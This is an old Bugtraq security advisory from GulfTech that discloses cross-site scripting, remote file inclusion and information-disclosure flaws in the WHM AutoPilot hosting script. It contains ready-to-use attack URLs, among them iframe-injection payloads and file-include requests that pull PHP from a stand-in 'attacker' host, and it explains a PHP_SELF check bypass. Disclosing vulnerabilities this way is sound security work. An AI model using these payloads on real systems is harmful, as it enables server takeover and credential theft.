Date: Tue, 28 Dec 2004 06:33:47 -0600
From: "GulfTech Security" <security@...ftech.org>
To: <bugtraq@...urityfocus.com>, "OSVDB" <moderators@...db.org>,
	"Secunia Research" <vuln@...unia.com>
Subject: Multiple WHM Autopilot Vulnerabilities

# GulfTech Security Research	       December 28th, 2004
# Vendor  : Benchmark Designs, LLC
# URL     : http://www.whmautopilot.com/
# Version : WHM AutoPilot v2.4.6.5 && Others [All Versions]
# Risk    : Multiple Vulnerabilities

Started by a webhost looking for more out of a simple managment
script, Brandee Diggs (Owner of Spinn A Web Cafe, Founder of
Benchmark Designs) setout to build an internal management system
that could handle the day to day operations of a normal hosting
company. The key was to remove the need to constantly watch your
orders and manage the installs. Alas, WHM AutoPilot was born.
[ as quoted from their official website ]

Cross Site Scripting:
There are a significant number of cross site scripting issues in
WHM AutoPilot. Most of these are caused by calling scripts directly
and specifying certain variable values yourself. Below are a few
examples, though there are many more XSS holes than just the examples
I am showing below.

http://path/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://path/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E

I believe that every file in the /themes/blue/ directory can be
manipulated in this way, and of course this can be used to steal a
users credentials or render hostile code.

File Include Vulnerability:
WHM AutoPilot is susceptible to several potentially very dangerous
file include vulns. Below are several examples of how files can be
included and possibly executed remotely.

http://path/inc/header.php/step_one.php?server_inc=http://attacker/step_one_
tables.php
http://path/inc/step_one_tables.php?server_inc=http://attacker/js_functions.
php
http://path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.
php

This can be used to include php scripts and possibly take control
of the webserver and more. A user does not have to be logged in to
exploit this vulnerability either so that just makes it even more
dangerous. Now for something weird: See the first example I gave above?
Notice the "header.php/step_one.php"? Well, that was done to get around a
piece of code that looked something like this. I am not going to include
the actual code since this is proprietary software, but this should
definitely give you the idea of what happened.

if (ereg("test.php", $PHP_SELF)==true)
{
    include $server_inc."/step_one_tables.php";
}

This works because $PHP_SELF will return the value of "header.php/step_
one.php" expectedly. The below excerpt was taken from the php manual.

"PHP_SELF
The filename of the currently executing script, relative to the document
root. For instance, $_SERVER['PHP_SELF'] in a script at the address
http://example.com/test.php/foo.bar would be /test.php/foo.bar. The __FILE__

constant contains the full path and filename of the current (i.e. included)
file."

I see a lot of developers use this variable without giving much though
to how it can be taken advantage of. I have even found it can cause be
used to conduct cross site scripting attacks when the phpinfo() function
is called.

Information Disclosure:
By default WHM AutoPilot is shipped with a phpinfo() script that is
accessible to anyone. As far as I know WHM AutoPilot needs register globals
to work, but if you want to check php settings anyway the file can be found
in the root directory as "phpinfo.php"

Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00059-12272004

Credits:
James Bercegay of the GulfTech Security Research Team